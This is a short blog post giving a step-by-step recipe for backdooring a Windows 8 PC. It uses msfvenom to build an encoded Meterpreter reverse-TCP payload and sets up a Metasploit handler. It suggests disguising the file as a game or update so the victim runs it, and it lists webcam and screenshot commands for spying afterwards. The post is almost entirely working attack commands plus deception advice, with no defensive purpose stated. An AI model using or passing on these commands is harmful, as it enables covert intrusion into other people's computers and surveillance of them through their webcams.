Tuesday, April 26, 2016

HACK WINDOWS 8 - 8.1

HACK WINDOWS 8 - 8.1

Kali IP: 192.168.137.173
Victim IP: 192.168.137.1

1. Create a Backdoor
In Kali Open a Terminal and run this command:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.137.173 lport=4444 -e cmd/powershell_base64 -i 5 -f exe > /root/Desktop/backdoorr.exe

2. Start Metasploit Console
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.137.173
set lport 4444
exploit


3. Send the Backdoorr.exe to the Windows PC
Use your own style to make the Windows machine to execute your file.

Hint, you can rename to, new-game.exe, SreySarArt.exe or update.exe

Once user on Windows PC execute the file you will got 1 session opened.

 
OK, Enjoy.. with other things,
screenshot

webcam_list
webcam_snap
webcam_stream




Related to the above picture if you want to view the camera, 
Open a browser with URL:  file:///root/aPnewzuW.html 



OK, Done,

#Vannakk #Hacking #Windows-8-8.1 #Kali

No comments:

Post a Comment